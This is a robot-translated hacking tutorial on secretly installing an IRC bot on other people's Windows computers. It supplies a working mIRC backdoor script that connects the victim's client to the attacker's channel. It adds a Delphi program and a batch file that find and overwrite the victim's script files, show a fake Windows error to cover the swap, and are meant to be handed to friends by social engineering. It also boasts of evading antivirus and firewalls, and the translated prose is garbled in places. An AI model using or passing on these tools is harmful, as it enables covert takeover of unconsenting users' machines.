This page has been robot translated, sorry for typos if any. Original content here.

We hang up the bot on Windows.



1. Intro.
2. Trojans.
3. mIRC scripts.
I. write your script backdoor
II. write on the delphi program, which will insert the backdoor into the enemy mIRC
III. write on batch'ah prog, which will insert the backdoor into the enemy mIRC
IV. social engineering: vparivayu prog =)
4. Both ways in comparison.
5. How to protect yourself.
6. Outro.

1. In our times, among the owners of popular channels, it became fashionable to hang on the tunnels for a dozen bots from different linux shells to provide, so to speak, "channel security." I, of course, have nothing against all eggdrops out there, but how to be a simple mortal user who does not have any shell, scc, or knowledge (like the elite from channel # 31337 on the server irc.dal.net.ru =)? So in this article I'll tell you how to hang a bot on a machine with a win-like OS.
IMHO, there are only two ways to do this: Trojans and Trojans =) Let's start with the first one.

2. If you were on msn (irc.msn.com) before closing it, I probably managed to enjoy n-th number of bots on the channels #russian_chat, #russian_girls, #russian_andybig and so on. So, these bots are not eggdrops. This, so to speak, SubSeven. Heard about such a horse? Sub7 is the only Trojan on my memory that allows you to remotely hang irc-bot (I have not used trojans for a long time, so I do not know if it has any analogs). So download Sub'a from here and enjoy. Those who are not used to looking for easy ways can read on.

3. The capabilities of mirc scripts are very impressive. To write on them the same cgi-scanner is a trifling matter, not to mention a simple bot. For example, take the script WarSatan. It is just built and such a "simple bot." When you connect to your favorite irc-server, the script along the way connects the user's guest to the irc.webchat.org server and winds it on the channels #CHATOP, #MEKAH and #PANGKOR. That's the whole mechanism of work. Our task is to write the same simple backdoor in the form of a world plug-in.
I. I will comment on the most important lines.

on 1:CONNECT:{
;#открываем соединение с твоим irc cервером
.sockopen 31337 irc_сервер его_порт
}
on 1:DISCONNECT:{
;#при разрыве соединения убиваем сокет
.sockclose 31337
}
on 1:SOCKOPEN:31337:{
;#авторизуемся на irc-сервере
.sockwrite -n $sockname USER BOT "" "localhost" :Satanic bot
.sockwrite -n $sockname NICK ник_бота $+ $r(1,999)
;#заходим на твой канал
.sockwrite -n $sockname join твой_канал
}
on 1:SOCKREAD:31337:{
;#этот скрипт автоматически отвечает на серверный ping
;#без него сервер будет кидать бота, потому что тот не отвечает на пинги
.sockread %tmp
if ($gettok(%tmp,1,32) == ping) {
.sockwrite -n $sockname PONG $gettok(%tmp,2-,32)
}
}


We remove comments, substitute our values, number the lines (just copy it all into the mIRC-editor and save it - he himself numbers all) and save the resulting control.dll file.
The backdoor itself is ready. Now it remains to insert it into someone else's script.ini.

II. Here is the source for the delphi program, which looks for the screw on the script.ini file and, if the search outcome is successful, substitutes it for ours.

Important! Control.dll should be kept in the same directory with this program.

program Project1;

uses
SysUtils,
windows,
shellapi;


const search = 'script.ini'; //файл который нужно найти и заменить
replace = 'control.dll'; //файл, которым надо заменить, должен быть
// в том же месте откуда запуститься эта прога =)


var buf: array [0..255] of char;
fl: PChar;
flag:boolean = false;

//процедура замены файлов
procedure Change(where:pchar);

function CopyFile(FromFile, ToDir : string) : boolean; //функция копирования
var F : TShFileOpStruct;
begin
F.Wnd := 0; F.wFunc := FO_COPY;
FromFile:=FromFile+#0; F.pFrom:=pchar(FromFile);
ToDir:=ToDir+#0; F.pTo:=pchar(ToDir);
F.fFlags := FOF_ALLOWUNDO or FOF_NOCONFIRMATION or FOF_SILENT;
{$I-}
result:=ShFileOperation(F) = 0;
{$I+}
end;

begin
DeleteFile(where);
CopyFile(replace,where)
end;


//процедура глоб. поиска
function Find(DirN: string):boolean;
var
tsr: TSearchRec;
Full: string;

begin
find:=false;
if FindFirst(DirN + '\*.*', faAnyFile, tsr) = 0 then
repeat
if (tsr.Name = '.') or (tsr.Name = '..') then continue;
Full:= DirN + '\' + tsr.Name;
if tsr.Attr = faDirectory then //если каталог
Find(Full);
until (FindNext(tsr) <>0)or(tsr.Name = search)or flag;

if tsr.Name = search //если нашли
then begin
find:=true;
flag:=true;
Change(pchar(DirN+'\'+tsr.Name));
end;

end;


//Основной блок программы
begin
if SearchPath(nil,search,nil,sizeof(buf),buf,fl)>0 then
Change(buf)
else
begin
Find('c:');
// если надо и на других дисках искать то можешь сделать так:
// if Not Find('c:') then
// if Not Find('d:') then
// if Not Find('e:') then
//etc....
end;

end.


III. If you are not coding with the genus and the cha throws in the yeast from the word "compiler", let's write such a program on batch'ah.

echo off
cls
if exist mirc.ini goto in_the_same_dir
if exist c:\mirc\MIRC.INI set mirc=c:\mirc
if exist c:\mirc\mirc\MIRC.INI set mirc=c:\mirc\mirc
if exist c:\irc\MIRC.INI set mirc=c:\irc
if exist c:\irc\mirc\MIRC.INI set mirc=c:\irc\mirc
if exist c:\chat\mirc\MIRC.INI set mirc=c:\chat\mirc
if exist c:\chat\MIRC.INI set mirc=c:\chat
if exist c:\progra~1\mirc\MIRC.INI set mirc=c:\progra~1\mirc
if exist c:\chat\looksharp\MIRC.INI set look=c:\chat\looksharp
if exist c:\mirc\looksharp\MIRC.INI set look=c:\mirc\looksharp
if exist c:\irc\looksharp\MIRC.INI set look=c:\irc\looksharp
if exist c:\progra~1\looksharp\MIRC.INI set look=c:\progra~1\looksharp
if exist c:\progra~1\trion\MIRC.INI set neo=c:\progra~1\trion
if exist c:\progra~1\neo-ra\MIRC.INI set neo=c:\progra~1\neo-ra
if exist c:\progra~1\NeoRa\Trion\MIRC.INI set neo=c:\progra~1\NeoRa\Trion
if exist c:\progra~1\NeoRa\MIRC.INI set neo=c:\progra~1\NeoRa
if exist c:\chat\NeoRa\MIRC.INI set neo=c:\chat\NeoRa
if exist c:\irc\NeoRa\MIRC.INI set neo=c:\irc\NeoRa
if exist c:\chat\neo-ra\MIRC.INI set neo=c:\chat\neo-ra
if exist c:\irc\neo-ra\MIRC.INI set neo=c:\irc\neo-ra
if exist c:\chat\Trion\MIRC.INI set neo=c:\chat\Trion
if exist c:\irc\Trion\MIRC.INI set neo=c:\irc\Trion
if exist c:\Trion\MIRC.INI set neo=c:\Trion
if exist c:\NeoRa\MIRC.INI set neo=c:\NeoRa
if exist c:\Neo-ra\MIRC.INI set neo=c:\Neo-ra
if exist d:\chat\NeoRa\MIRC.INI set neo_here=d:\chat\NeoRa
if exist d:\irc\NeoRa\MIRC.INI set neo_here=d:\irc\NeoRa
if exist d:\chat\neo-ra\MIRC.INI set neo_here=d:\chat\neo-ra
if exist d:\irc\neo-ra\MIRC.INI set neo_here=d:\irc\neo-ra
if exist d:\chat\Trion\MIRC.INI set neo_here=d:\chat\Trion
if exist d:\irc\Trion\MIRC.INI set neo_here=d:\irc\Trion
if exist d:\Trion\MIRC.INI set neo=d:\Trion
if exist d:\NeoRa\MIRC.INI set neo=d:\NeoRa
if exist d:\Neo-ra\MIRC.INI set neo=d:\Neo-ra
if exist d:\mirc\MIRC.INI set mirc=d:\mirc
if exist d:\mirc\mirc\MIRC.INI set mirc=d:\mirc\mirc
if exist d:\irc\MIRC.INI set mirc=d:\irc
if exist d:\irc\mirc\MIRC.INI set mirc=d:\irc\mirc
if exist d:\chat\mirc\MIRC.INI set mirc=d:\chat\mirc
if exist d:\chat\MIRC.INI set mirc=d:\chat
if exist d:\looksharp\MIRC.INI set look=d:\looksharp
if exist d:\chat\looksharp\MIRC.INI set look=d:\chat\looksharp
if exist d:\mirc\looksharp\MIRC.INI set look=d:\mirc\looksharp
if exist d:\irc\looksharp\MIRC.INI set look=d:\irc\looksharp
if "%mirc%"=="" goto no_mirc
deltree /y %mirc%\script.ini
copy control.dll %mirc%\script.ini
cls
:no_mirc
if "%look%"=="" goto no_look
deltree /y %look%\System\lookevents04.sys
copy control.dll %look%\System\lookevents04.sys
cls
:no_look
if "%neo%"=="" goto end
deltree /y %neo%\root\trionscr7.ini
copy control.dll %neo%\root\trionscr7.ini
cls
goto end
:in_the_same_dir
deltree /y script.ini
copy control.dll script.ini
:end
echo Your Microsoft Windows is not correctly installed.
echo Pleas re-install it and try again

This canoe by a poke method looks for mIRC, NeoRa Trion and Looksharp. The probability of finding is rather insignificant, so it is desirable to persuade the subject to put this file together with control.dll in one directory with its irc-client. In case of a successful search outcome, the file is replaced by another script.ini by our control.dll.
Convert this bat'nik into exe'shnik some bat2exec'om and you can vparivat your friends.

IV. I think it's not for me to tell you how to "vparivat" someone exe'shnik. I just want to emphasize one feature. Agree, please start your exe'shnik evokes suspicion even at the most intimate user. So, you can go the other way. To do this, go back to step I. DO NOT NUMBER the line of the script, just put it in the file joke.mrc. All. Now give it to your friends with the words: put it in the catalog with your world, enter in its console "/ load -rs joke.mrc" and enjoy all the charms of the plug =)

4. And so, what is the best way to replace script.ini?
1) is not caught by antivirus software
2) is not caught by FairWalls. I think that many people will start proving with their foam from the mouth that ZoneAlarm and AtGuard will protect them from this. Specifically for them I explain: if mIRC in these two firewalls is registered as Allowed server \ client, the FV does not even peek when the connection is opened by the backdoor.
3) it is difficult to detect / kill even an experienced user

5. And now about how to protect yourself. Again, I will not consider the method with Sub7'om (because with it everything is clear: AVP + ZoneAlarm), I'll immediately go to the second.
For detection of a script backdoor it is worthwhile to use some mIRC plugin like IPSearch'a, which would search on the server of the user with the same ip as you. If there is one, then someone definitely hung a bot on you. If this is not found, then either the bot on another server, or you're clean.
Also, to detect the bot, you can use the same ZAlarm: at the moment, the largest IRC servers, check all clients on the proxy. How? A simple port scan. So, if you connect to the server irc.some.com, and the ports at the ta scan some irc.lame.com, it's worth thinking about ...
How to kill a backdoor? If you do not understand the scripting, just reinstall the irc client.

6. Well, what can I say in conclusion? Do not use unfamiliar scripts and do not force others to do this =)